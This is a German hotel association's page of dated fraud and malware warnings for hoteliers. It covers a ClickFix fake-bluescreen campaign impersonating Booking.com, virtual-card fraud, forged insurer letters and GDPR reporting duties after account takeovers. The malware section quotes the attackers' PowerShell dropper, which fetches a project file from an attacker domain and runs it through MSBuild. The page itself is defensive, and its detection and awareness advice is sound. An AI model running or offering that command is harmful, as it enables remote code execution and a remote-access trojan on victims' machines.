Warnmeldung

Fake-Bluescreens: Malware-Angriffe auf europäische Hotels

Stand: 12.01.2026

Aktuell warnen mehrere Sicherheitsforscher vor einer Angriffswelle auf die europäische Hotelbranche: Angreifer mit mutmaßlichen Verbindungen nach Russland schleusen Schadsoftware ein, indem sie Mitarbeiter dazu bringen, diese selbst zu installieren – getarnt als Fehlerbehebung nach einem vermeintlichen Windows-Bluescreen.

Wie das Sicherheitsunternehmen Securonix darlegt, verfolgen die Analysten seit Monaten eine als PHALT#BLYX bezeichnete Angriffskampagne. Diese nutzt eine Variante der bekannten ClickFix-Angriffsmethode, die auf geschicktem Social Engineering basiert.

Überblick über die Erstinfektion:

Die Infektion beginnt mit einer Phishing-E-Mail, die einen Link zu einer gefälschten Booking.com-Seite enthält. Die Kette verläuft wie folgt:

1. Erster Zugriff: Der Benutzer klickt auf einen Link in einer Phishing-E-Mail, die einer Stornierungsbenachrichtigung von Booking.com nachempfunden ist.
2. Social Engineering (ClickFix): Der Benutzer wird auf eine gefälschte Seite weitergeleitet, die eine irreführende CAPTCHA-ähnliche Browserfehlermeldung anzeigt. Ein Klick auf diese Fehlermeldung löst eine gefälschte „Blue Screen of Death“-Animation (BSOD) aus und fordert den Benutzer auf, das Problem durch Einfügen eines schädlichen Skripts in das Windows-Ausführen-Dialogfeld zu „beheben“.
3. Dropper (PowerShell): Das eingefügte Skript führt einen PowerShell-Befehl aus, der eine MSBuild-Projektdatei (`v.proj`) herunterlädt.
4. Staging (MSBuild): `MSBuild.exe` kompiliert und führt die eingebettete Nutzlast innerhalb von `v.proj` aus.
5. Persistenz & Umgehung: Die Malware deaktiviert Windows Defender und etabliert Persistenz über eine `.url`-Datei im Autostart-Ordner.
6. Final Payload (DCRat): Die Binärdatei `staxs.exe` wird ausgeführt, wodurch eine Verbindung zum Command-and-Control-Server (C2) hergestellt und eine sekundäre Payload in „aspnet_compiler.exe“ eingeschleust wird.

Erstinfektion: Der Köder

Der Angriff erfolgt über eine gezielte Spam-Kampagne, die offizielle Korrespondenz von Booking.com imitieren soll. Die E-Mail informiert den Empfänger über eine „Stornierung einer Reservierung“ und zeigt prominent einen hohen Betrag (z. B. 1.004,38 €) an. Dieser hohe Betrag erzeugt ein Gefühl der Dringlichkeit und Panik und veranlasst das Opfer zu sofortiger Überprüfung. Sobald der Nutzer auf den Button „Details ansehen“ klickt, um den Betrag zu überprüfen, führt der Link nicht zu Booking.com. Stattdessen wird der Nutzer über eine Zwischenseite (` oncameraworkout[.com/ksbo` ) auf die schädliche Domain ` low-house[.com` umgeleitet .

Der Missbrauch der Marke Booking.com ist eine bekannte Taktik. Cyberkriminelle haben in der Vergangenheit Hotelkonten kompromittiert, um Gäste direkt zu kontaktieren oder Phishing-E-Mails mit gefälschten Anfragen (z. B. zu „Allergien“ oder „Sonderwünschen“) an Hotelbesitzer zu versenden. Diese früheren Kampagnen nutzten typischerweise direkte Malware-Links. Die E-Mails enthielten Links zu File-Sharing-Seiten, die Infostealer wie RedLine, Vidar oder MetaStealer hosteten. Obwohl PHALT#BLYX dasselbe Ziel (Gastgewerbe) und dieselben Zuordnungsmerkmale (russische Cyberkriminelle) aufweist, stellt es eine bedeutende taktische Veränderung in der Art der Übermittlung und des Auslösers dar.

Phase 2: Gefälschte Buchungsseite

Die Landingpage (` low-house[.com` ) ist eine detailgetreue Nachbildung der offiziellen Booking.com-Oberfläche und soll Vertrauen erwecken. Die Seite verwendet das offizielle Booking.com-Branding, inklusive der korrekten Farbpalette, Logos und Schriftarten. Für Laien ist sie von der Originalseite nicht zu unterscheiden. Anstatt jedoch die Reservierungsdetails anzuzeigen, präsentiert die Seite eine irreführende Einblendung. Es wird eine gefälschte Browser-Fehlermeldung angezeigt, die besagt: „Das Laden dauert zu lange.“ Die Fehlermeldung enthält einen prominent platzierten „Seite aktualisieren“-Button. Entscheidend ist, dass es sich hierbei nicht um ein natives Browser-Steuerelement handelt, sondern um ein stilisiertes HTML-Element, das durch das JavaScript des Angreifers gesteuert wird.

Der Nutzer, der aufgrund der in der E-Mail erwähnten betrügerischen Abbuchung bereits beunruhigt ist, ist darauf vorbereitet, technische Hürden schnell zu überwinden. Die vorgetäuschte Fehlermeldung nutzt diese Dringlichkeit aus und verleitet ihn dazu, ohne Hinterfragen auf den „Aktualisieren“-Button zu klicken. Dieser Klick ist der entscheidende Wendepunkt, an dem der Nutzer vom passiven Beobachter zum aktiven Teilnehmer des Kompromittierungsversuchs wird.

Entscheidend ist, dass die schädliche Domain „ low-house[.com “ von Sicherheitsanbietern weitgehend unentdeckt bleibt. Zum Zeitpunkt dieser Analyse ist die Website weiterhin online und erreichbar, umgeht die meisten Webfilter und ermöglicht es Angreifern, Opfer zu erreichen, ohne von Standard-Browserschutzmechanismen blockiert zu werden.

Phase 3: Vorgetäuschter Bluescreen & Zwischenablage-Injektion

Sobald das Opfer auf den „Aktualisieren“-Button klickt, schnappt die Falle zu. Der Browser wechselt sofort in den Vollbildmodus und simuliert einen Bluescreen (BSOD). Dieser drastische Wechsel soll den Nutzer schockieren und ihn glauben lassen, sein System habe einen kritischen Fehler erlitten. Dadurch entsteht ein Moment der Panik, der sein Urteilsvermögen trübt.

Anschließend erscheint über dem simulierten Absturzbildschirm eine Aufforderung, die eine schnelle Lösung zur „Behebung“ des Problems anbietet. Sie fordert den Benutzer auf, eine bestimmte Tastenkombination auszuführen: 

1. Halten Sie die Windows-Taste gedrückt und drücken Sie R (öffnet den Windows-Ausführen-Dialog).
2. Halten Sie die Strg-Taste gedrückt und drücken Sie V (fügt den Inhalt der Zwischenablage ein).
3. Drücken Sie OK oder Enter (führt den Befehl aus).

Für einen technisch nicht versierten Benutzer sieht dies wie ein üblicher Schritt zur Fehlerbehebung oder eine „geheime“ Administratorverknüpfung aus. Tatsächlich handelt es sich um einen ClickFix-Angriff. Sobald der Benutzer mit der Seite interagierte, wurde unbemerkt ein schädliches PowerShell-Skript in seine Zwischenablage kopiert. Durch Befolgen der Anweisungen auf dem Bildschirm wird das Opfer dazu verleitet, das Windows-Dialogfeld „Ausführen“ zu öffnen und die Schadsoftware manuell einzufügen und auszuführen. Diese Technik ist besonders gefährlich, da sie darauf beruht, dass der Benutzer selbst aktiv wird, um Sicherheitskontrollen zu umgehen, die normalerweise die automatische Skriptausführung blockieren würden.

Phase 4: Der PowerShell-Dropper

Wenn der Benutzer den eingefügten Befehl ausführt, wird folgendes PowerShell-Skript ausgeführt:

powershell -c “start https[://admin.booking.com;$msb=(gci C:\ -filter msbuild.exe -r -ea 0|select -f 1).FullName;iwr 2fa-bns.com -o $env:ProgramData\v.proj;& $msb $env:ProgramData\v.proj”

Nach der Ausführung des Befehls lädt das System im Hintergrund weitere Dateien nach und nutzt legitime Windows-Komponenten zur Code-Ausführung. Dadurch fügt sich die Schadsoftware in normale Systemaktivitäten ein und entgeht Sicherheitstools. Das Endergebnis ist die Installation eines Remote-Access-Trojaners, der den Angreifern dauerhafte Kontrolle über das kompromittierte System verschafft und ihnen ermöglicht, Aktivitäten auszuspähen und weitere Schadsoftware nachzuladen.

Die Sicherheitsforscher beobachten, dass die Angreifer ihre Infektionskette über mehrere Monate hinweg weiterentwickelt haben. Sie sind von einfacheren HTML-Application-Techniken zu einer ausgefeilteren MSBuild-basierten Ausführung übergegangen, was die Erkennung durch herkömmliche Antivirenprogramme deutlich erschwert.

Die technische Komplexität der Infektionskette offenbart die klare Absicht, der Erkennung zu entgehen und sich langfristig im System einzunisten. Die Verwendung einer angepassten MSBuild-Projektdatei zur Ausführung über einen Proxy, gepaart mit der aggressiven Manipulation von Windows Defender-Ausnahmen, zeugt von einem tiefen Verständnis moderner Endpunktschutzmechanismen. Darüber hinaus wird die finale Schadsoftware nicht einfach abgelegt, sondern in legitime Prozesse wie `aspnet_compiler.exe` eingeschleust, wodurch die schädliche Aktivität effektiv hinter der Fassade normaler Systemvorgänge verborgen wird.

Hinter der Oberfläche verbirgt sich eine hohe Widerstandsfähigkeit und operative Sicherheit der eingesetzten AsyncRAT-Payload. Die Fähigkeit der Malware, Verbindungspunkte zu randomisieren und potenziell Dead-Drop-Resolver wie Pastebin zu nutzen, deutet auf eine Botnetz-Infrastruktur hin, die darauf ausgelegt ist, die Abschaltung einzelner Server zu überstehen und die Verbindung in feindlichen Umgebungen aufrechtzuerhalten.

Die Kampagne zielt zwar mit gezielten finanziellen Anreizen auf das Gastgewerbe ab, doch die zugrundeliegende Vorgehensweise deutet auf einen Angreifer hin, der sich an verschiedene Branchen anpassen kann. Das Vorhandensein russischer Artefakte in den Einsatzskripten liefert wichtige Hinweise auf die Urheberschaft. Da sich diese Taktiken ständig weiterentwickeln, müssen Unternehmen über die dateibasierte Erkennung hinausgehen und sich auf Verhaltensanomalien und die Nachverfolgung von Prozessabläufen konzentrieren, um diese mehrstufigen Angriffe zu erkennen und zu stoppen.

Empfehlungen

• Sensibilisierung der Nutzer (ClickFix): Schulen Sie Ihre Mitarbeiter hinsichtlich der „ClickFix“-Taktik. Warnen Sie ausdrücklich davor, Anweisungen zum Einfügen von Skriptcode in das Windows-Ausführen-Dialogfeld oder PowerShell-Terminals zu befolgen, insbesondere wenn Browserfehlerseiten dazu auffordern. Aktivieren Sie unter Windows die Sichtbarkeit von Dateierweiterungen, um die korrekte Verwendung von Dateierweiterungen sicherzustellen.
   
• Phishing-Schutz: Seien Sie vorsichtig bei E-Mails, die angeblich von Booking.com stammen und dringende Zahlungsaufforderungen enthalten. Überprüfen Sie Anfragen über offizielle Kanäle, anstatt auf Links zu klicken.
   
• Überwachung von Binärdateien, die unter „Living off the Land“ laufen: Implementieren Sie eine strenge Überwachung für `MSBuild.exe`. Warnen Sie bei Fällen, in denen Projektdateien aus nicht standardmäßigen Verzeichnissen wie `%ProgramData%` ausgeführt oder externe Netzwerkverbindungen hergestellt werden.
   
• Prozessinjektionsüberwachung: Überwachen Sie legitime Systembinärdateien (wie `aspnet_compiler.exe`, `RegSvcs.exe`, `RegAsm.exe`) auf ungewöhnliches Verhalten, wie z. B. das Herstellen ausgehender Netzwerkverbindungen zu unbekannten IPs auf nicht standardmäßigen Ports (z. B. 3535).
   
• Dateisystemüberwachung: Überwachung auf die Erstellung verdächtiger Dateitypen (`.proj`, `.exe`) in `%ProgramData%` und Internetverknüpfungsdateien (`.url`) im Autostart-Ordner.
   
• PowerShell-Protokollierung: Aktivieren Sie die PowerShell-Skriptblockprotokollierung (Ereignis-ID 4104), um den Inhalt der ausgeführten Skripte zu erfassen und zu analysieren. Dadurch kann die ursprüngliche Dropper-Logik aufgedeckt werden.

Warnung vor Betrugsfällen mit Virtuellen Kreditkarten (VCC) von Booking.com

Stand: 08.09.2025

Aus dem Kreis unserer Mitglieder wurde uns ein Betrugsfall im Zusammenhang mit den von Booking.com ausgegebenen Virtuellen Kreditkarten (VCC) gemeldet. Nach den vorliegenden Informationen wurden einige dieser Karten bereits vor Anreise der Gäste von Dritten unberechtigt belastet, wodurch ein Schaden in erheblicher Höhe entstanden ist. Besonders problematisch ist, dass die Belastungen durch eine unbekannte Firma erfolgt sind und das betroffene Hotel keinerlei Einfluss auf diesen Vorgang hatten. Auffällig war, dass  die Belastung der VCC im Extranet von Booking.com teilweise ohne Zwei-Faktor-Authentifizierung (2FA) erfolgt ist. Zusätzlich traten Unstimmigkeiten bei einzelnen Buchungen auf (z. B. Stornierungen, die im Extranet nicht korrekt abgebildet wurden).

Ähnliche Fälle wurden uns auch von den Kollegen aus Italien gemeldet. Es ist daher nicht auszuschließen, dass weitere Betriebe betroffen sind, insbesondere wenn noch nicht eingelöste VCC für künftige Buchungen bereits kompromittiert wurden. Wir raten daher, die Abwicklung von VCC engmaschig zu überwachen, verdächtige Vorgänge genau zu dokumentieren und umgehend an Booking.com zu melden und im Missbrauchsfall ggf. auch die zuständigen Strafverfolgungsbehörden einzuschalten.

Leider war der Support seitens Booking.com im vorliegenden Fall sehr langsam und (bisher) nicht hilfreich. 

Sollte ein ähnlicher Fall auch in Ihrem Haus aufgetreten sein, melden Sie diese bitte an Tobias Warnecke, warnecke@hotellerie.de

Der geschilderte Vorfall verdeutlicht, dass Virtuelle Kreditkarten von Booking.com nicht in jedem Fall die zugesicherte Sicherheit gewährleisten.

Kriminelle fälschen BGN- und DGUV-Schreiben und fordern zu Zahlungen auf

Stand 31.03.2025

Kriminelle versenden aktuell postalisch sowie per E-Mail Schreiben an BGN-Mitgliedsunternehmen mit dem Betreff „Pflicht zur Anbringung des Augenspülstation-Schildes – Frist zur Umsetzung“ beziehungsweise „Wichtige Zahlungsaufforderung für Augenspül-Schild (verpflichtend)“. Den Schreiben beigefügt ist eine Rechnung, neuerdings erweitert um eine "Augenspülstation nach DIN Norm". 

Zudem werden seit dem Wochenende (30./31.03.25) Schreiben mit dem Absender "DGUV Deutsche Gesetzliche Unfallversicherung" mit dem Betreff "Einführung des digitalen Präventionsmoduls zum 1. Juli 2025 Verpflichtende Teilnahme für alle Mitgliedsunternehmen – inkl. Beitragssenkung" verschickt. Auch diese Schreiben sind Fälschungen und Betrug!

Diese Schreiben sind mit hoher krimineller Energie gefälscht. Sowohl das Anschreiben als auch die Rechnung enthalten eine angebliche BGN-Telefonnummer, unter der sich die Berufsgenossenschaft Nahrungsmittel und Gastgewerbe meldet. Vermutlich landen diese Anrufe in einem Call-Center im Ausland, die Verbrecher haben offensichtlich einen enormen Aufwand betrieben. Auch die Mail-Adresse, die in den Schreiben angegeben ist, ist falsch. Die verwendete Adresse „berufsgenossenschaft-nahrungsmittel-gastgewerbe.com“ wird auf die tatsächliche Seite der BGN weitergeleitet – auch dies ein Täuschungsmanöver. Mittlerweile variieren die verschiedenen Domain-Namen, auch hier hat die BGN entsprechende Maßnahmen eingeleitet. 

Wichtig: Leisten Sie keine Zahlungen! Die BGN versendet grundsätzlich keine Rechnungen für Materialien, wie etwa für Schilder.

Die Strafverfolgungsbehörden sind informiert, die BGN unternimmt alle möglichen rechtlichen Schritte – auch, um einen eventuellen Schaden für die Mitgliedsbetriebe möglichst klein zu halten. Sollten Sie bereits Zahlungen geleistet haben, melden Sie sich bitte per Mail an . Wir raten in diesen Fällen dringend zur Anzeige und teilen Ihnen dann das entsprechende Aktenzeichen sowie den Mailkontakt der Strafverfolgungsbehörden mit. 

Wenn Zweifel bestehen: Die Präventions-Hotline der BGN beantwortet unter 0621/4456-3517 alle Fragen, ob ein Anruf oder ein Schreiben tatsächlich von der BGN in Auftrag gegeben wurde.

Augen auf bei CAPTCHA - Phishing-Kampagne hat es auf Hotellerie-Angestellte abgesehen

Stand: 14.03.2025

Microsoft veröffentlicht eine Warnung zu einer neuen Phishing-Masche, bei der sich die Betrügergruppe Storm-1865 als Booking.com ausgibt, um auf Hotellerie-Rechnern Malware für Kreditkartendiebstahl und Finanzbetrug zu installieren.

Bei der Masche bekommen Hotellerie-Angestellte zunächst eine E-Mail - vermeintlich von Booking.com - zugeschickt. Der Inhalt der E-Mails bezieht sich häufig auf negative Hotelbewertungen, Anfragen von potenziellen Reisenden oder Anfragen zur Kontoverifizierung. Die E-Mails sollen eine schnelle Reaktion hervorrufen und die Empfänger dazu bringen, auf einen Link oder in eine PDF zu klicken, ohne die Legitimität der Nachricht zu prüfen.

Sobald ein Empfänger auf den Link klickt, wird er auf eine gefälschte Booking.com-Webseite umgeleitet, die ein CAPTCHA-Rätsel („Completely Automated Public Turing test to tell Computers and Humans Apart") anzeigt.

Dieses gefälschte CAPTCHA ist Teil einer als ClickFix bekannten Social-Engineering-Technik. Die Benutzer werden dabei angewiesen, eine erfundene Aufgabe durch Kopieren und Einfügen einer Tastenkombination in den "Windows-Ausführen"-Dialog zu lösen. So kann die schädliche Malware ohne die sonst übliche Sicherheitsmechanismen auf die Rechner der Opfer gedownloaded werden!

Achtung Scam: Verifizierung der Zahlungsinformationen bei Hotelbuchung über Booking.com

Stand: 11. Oktober 2024

Erneut erreichen uns die Meldungen von Betrugsversuchen im Zusammenhang mit Hotelbuchungen über die Plattform von Booking. Folgende Abbildungen zeigen den Versuch von Betrügern, über eine WhatsApp Fake-Nachricht im Namen eines gebuchten Hotels über Booking, den Gast dazu zu bringen, auf einen personalisierten Link zur Verifizierung des Zahlungsmittels zu klicken. In diesem Fall hat der Gast erfreulicherweise richtig reagiert und direkt beim Hotel nachgefragt, ob mit seiner Buchung alles in Ordnung ist.

Meldepflicht nach Art. 33 DSGVO bei Phishing-Emails an Hotelgäste über den Messaging-Dienst von Booking.com

© Canva Pty. Ltd

In der letzten Zeit haben Cyberkriminelle ausgeklügelte Methoden entwickelt, um die Kontrolle über Hotelkonten bei der Online-Hotelbuchungsplattform Booking.com zu erlangen (siehe unten).

Aus den Hotelkonten bei Booking.com senden die Betrüger sodann sehr glaubhafte E-Mails und Textnachrichtenüber die Kommunikationskanäle der Booking-Plattform an aktuelle und ehemalige Gäste der Hotels. Da die Kriminellen alle Buchungsdaten einsehen können, wirken die Nachrichten auch für geschulte Augen sehr überzeugend.

Meistens senden diese Betrüger gefälschte Aufforderungen im Namen der Hotels, die eine erneute Eingabe der Kreditkartendaten verlangen oder zu sonstigen Zahlungen auffordern. Kunden, die auf diese Anfragen reagieren und ihre Kreditkartendaten eingeben, werden zu Opfern von Kreditkartenbetrug.

Die Hotels werden auf den Betrug häufig erst dadurch aufmerksam, dass betroffene Gäste direkt im Hotel anrufen und nachfragen, ob die erneute Eingabe der Kreditkartendaten bzw. die erneute Zahlung des Übernachtungspreises wirklich notwendig ist.

Nach unserer Auffassung treffen Booking.com unstreitig besondere Sorgfalts-, Melde- und Abhilfepflichten. Wer Nutzer und Hotelpartner zwingt, ausschließlich über das plattformeigene Extranet zu kommunizieren, der muss auch entsprechende Sicherheitsstandards gewährleisten. Auch der teils „stiefmütterliche“ Umgang mit der Angelegenheit und das Fehlen unverzüglicher und effektiver Abhilfemaßnahmen durch Booking.com stellt eine Pflichtverletzung da.

Um Klarheit darüber zu erlangen, welche Pflichten für Hotels entstehen, die von einer solchen Attacke betroffene sind, hat der Hotelverband Deutschland (IHA) beim Landesbeauftragten für den Datenschutz und die Informationsfreiheit in Berlin um rechtliche Einschätzung gebeten, ob der geschilderte Sachverhalt für betroffene Hotels zu einer Meldepflicht nach Art. 33 DSGVO führen könnte.

Die Antwort des Landesbeauftragten für den Datenschutz in Berlin bezieht sich auf Ausführungen der niederländischen Aufsichtsbehörde, die für Booking.com zuständig ist, und in der Booking.com alle Verantwortung von sich weist.

Die Antwort des Berliner Datenschutzbeauftragten hat den folgenden Grundtenor:

„Die bisher eingegangenen Meldungen bzgl. des Datenschutzvorfalls konnten noch nicht abschließend bewertet werden. Leider sind noch nicht alle Antworten von den meldenden Unternehmen eingegangen.

Wenn die Schutzverletzung der personenbezogenen Daten beim IT-System des Hotels als Verantwortlichem passiert, dann ist das betroffene Unternehmen nach Art. 33 DS-GVO meldepflichtig. Dass die versendeten E-Mails wie E-Mails von Booking.com aussehen, ist hier nicht entscheidend.“

Die vollständige Antwort finden Sie hier.

Auch nach Auffassung der Rechtsanwaltssozietät Spirit Legal besteht bei diesen Fällen in der Regel eine behördliche Meldepflicht für die Hotels nach Art. 33 DSGVO. Peter Hense, Rechtsanwalt und Partner bei Spirit Legal gibt folgende Einschätzung:

• Die Kommunikationsinfrastruktur des Extranets teilen sich die Hotels mit Booking.com, für die gemeinsam verwalteten Buchungsdaten sind sie gemeinsame Verantwortliche, für die sowohl Booking.com als auch die Hotels alle gesetzlichen Pflichten treffen.
   
• Bei Zugriff auf die Hotelaccounts liegt in jedem Fall eine meldepflichtige Verletzung vor. Das gilt auch dann, wenn auf die Accounts der Hotels nicht durch Phishing, sondern durch eine „Backdoor“ bei Booking.com zugegriffen würde. Es bleibt bei der gemeinsamen Infrastruktur und Datenhaltung, welche eine gemeinsame Verantwortlichkeit begründen.
   
• Nur in dem Fall, dass die Daten direkt in einem vom Extranet unabhängigen IT-System bei Booking.com abgegriffen werden, was zumindest denkbar ist, wäre allein Booking.com verantwortlich.
   
• Auch eine Information der Betroffenen, also aller über das Extranet identifizierbaren Gäste, ist aufgrund der Risiken für die Gäste erforderlich, Art. 34 DSGVO sieht diese gesetzliche Pflicht vor. Eine solche Information muss direkt gegenüber den Gästen erfolgen und dient der Vermeidung weitergehender Schäden.
   
• Von einer Meldepflicht kann nur abgesehen werden, wenn es nachweislich kein Risiko gab (Phishing-Attacke fliegt sofort auf, keine Daten abgeflossen, Zugänge wurden sofort gesperrt). In allen anderen Fällen muss gemeldet werden!
   
• Wichtig ist die Meldepflicht bei der eigenen Cybersecurity-Versicherung (wenn vorhanden), hier besteht eine Meldepflicht i.d.R. aufgrund der (teils unterschiedlichen) Versicherungsbedingungen. Wird eine Meldung unterlassen, kann dies zum vollständigen Erlöschen des Versicherungsschutzes führen.
   
• Gleiches gilt unter PCI-DSS gegenüber den Kreditkarten-Anbietern.

Die wichtigsten Punkte, die man als Hotel in die Wege leiten muss, wenn der Booking.com-Account gehackt und Gäste von Betrügern kontaktiert wurden, sind hier noch einmal dargestellt - es besteht kein Anspruch auf Vollständigkeit!

Maßnahmen des Hotels bei Booking.com:

• Meldung des Sicherheitsproblems an Booking.com (binnen 24-Stunden) (https://partner.booking.com/de/hilfe/recht-sicherheit/sicherheit/ein-sicherheitsproblem-melden).
   
• Sofortige Änderung der Passwörter zum Booking.com Extranet (es ist ratsam, auch die Passwörter zu den eigenen E-Mail-Konten zu prüfen).
   
• Sofern noch nicht geschehen, Aktivierung der Zwei-Faktor-Authentifizierung für das Extranet-Konto bei Booking.com bzw. Prüfung, ob die hinterlegte Telefonnummer zur Verifizierung korrekt ist.
   
• Überprüfung der Einstellungen zu den automatisierten Nachrichten (Posteingang -Buchungsnachrichten - Nachrichtenvorlagen bearbeiten).
   
• Überprüfung der bisherigen Gästekommunikation nach fremden Nachrichten.
   
• Information an alle betroffenen Gäste, dass der Hotel-Account bei Booking.com gehackt wurde und möglicherweise Fake-Nachrichten versendet werden.

Maßnahmen im Hotel:

• Überprüfung der eigenen IT-Systeme auf Viren oder Spyware.
   
• Interne Passwörter ändern.
   
• Schulung und Sensibilisierung der Mitarbeiter.

Mahnahmen gegenüber den Datenschutzbehörden:

• Meldung der Datenpanne bei dem zuständigen Beauftragten für Datenschutz und Informationsfreiheit binnen 72 Stunden nach bekannt werden der Panne.
  
  Eine Übersicht der der Datenschutzbeauftragen finden Sie hier: https://www.bfdi.bund.de/DE/Service/Anschriften/Laender/Laender-node.html

Sonstige Maßnahmen:

• Meldung bei der eigenen Cybersecurity-Versicherung (wenn vorhanden).
   
• Gleiches gilt unter PCI-DSS gegenüber den Kreditkarten-Anbietern.
   
• Optional: Strafanzeige bei der Zentralen Ansprechstellen Cybercrime der Polizeien für Wirtschaftsunternehmen (https://www.polizei.de/Polizei/DE/Einrichtungen/ZAC/zac_node.html)

Kontaktaufnahme mit angeblichem Gästefeedback im Namen von Booking.com

Stand: 03. Juni 2024

Es kursieren aktuell erneut Phishing-Emails, die fälschlicherweise im Namen von Booking.com versendet werden. Angeblich läge eine beträchtliche Anzahl von Beschwerden von Gästen über das unprofessionelle und unbefriedigende Verhalten des Hotelpersonals vor.  Sollte das Hotel nicht reagieren, wird mit Sperrung des Hoteleintrags bei Booking.com gedroht.

Konkret heißt es in der E-Mail:

Wir schreiben Ihnen, um Sie auf ein dringendes Problem aufmerksam zu machen, von dem wir kürzlich Kenntnis erhalten haben. Wir haben eine beträchtliche Anzahl von Beschwerden von Gästen über das unprofessionelle und unbefriedigende Verhalten Ihres Personals erhalten.

Diese Angelegenheit ist sehr besorgniserregend, da sie sich direkt auf den Ruf und die Vertrauenswürdigkeit Ihrer Einrichtung auf unserer Plattform auswirkt. Wir fordern Sie dringend auf, diese Beschwerden umgehend zu bearbeiten und die notwendigen Schritte zu unternehmen, um sicherzustellen, dass sich solche Vorfälle nicht wiederholen.

Wir weisen Sie darauf hin, dass die Nichtbehebung dieses Problems dazu führen kann, dass der Zugang zum Eintrag Ihrer Immobilie auf unserer Plattform eingeschränkt wird.

Klicken Sie auf keinen Fall auf Links innerhal dieser E-Mail, es handelt es sich um eine Phishing-Mail!

Phishing-Emails an Gäste über Messaging-Dienst von Expedia

Stand: 09. April 2024

Aktuell erreicht uns die Meldung einer Betrugsmasche über den Messaging-Dienst von Expedia. Diese Betrugsversuche waren bisher fast ausschließlich über die Kommunikationsdienste von Booking.com beobachtet worden. Nun scheint auch Expedia betroffen zu sein.

Untenstehende Abbildung zeigt den Versuch von Hackern, über eine Fake-Nachricht im Namen eines gebuchten Hotels über Expedia, den Gast dazu zu bringen, auf einen personalisierten Link zur erneuten Eingabe seiner Kredidkartendaten zu klicken. Die Nachricht informiert den Gast über eine fehlgeschlagene Verifizierung des Zahlungsmittels. Sollte die erneute Eingabe der Kreditkartendaten nicht innerhalb von 24 Stunden erfolgen, würde das gebuchte Zimmer storniert werden.

Update zu neuen Betrugsvarianten im Zusammenhang mit dem System von Booking.com

Stand: 15.01.2024

Aktuell häufen sich erneut die Meldungen von diversen Betrugsfällen im Zusammenhang mit den Systemen der Online-Buchungsplattform Booking.com. Die aktuellsten Betrugsvarianten haben wir hier für Sie zusammengestellt.

Sollten Ihnen ähnliche Fälle wie nachstehend beschrieben begegnen, melden Sie diese bitte an Tobias Warnecke, warnecke@hotellerie.de.

Last-minute-Phishing durch Kurzfristbuchung

Aktuell erhalten wir Meldungen von Hotels, die eine Phishing-Email im Namen von Booking erhalten, die suggeriert, dass das Hotel schnell Einstellungen im Extranet anzupassen hat, sofern die vorgegebenen Einstellungen nicht weiter gewünscht werden. Dem Hotel wird unterstellt, dass in den Settings im Extranet hinterlegt wurde, dass das Hotel Kurzfristbuchungen auch ohne weitere Angaben des Gastes, inklusive Kreditkartendaten eingestellt hat. Sollte das Hotel diese Einstellung ändern wollen, müsste es unter dem angegebenen Link geändert werden.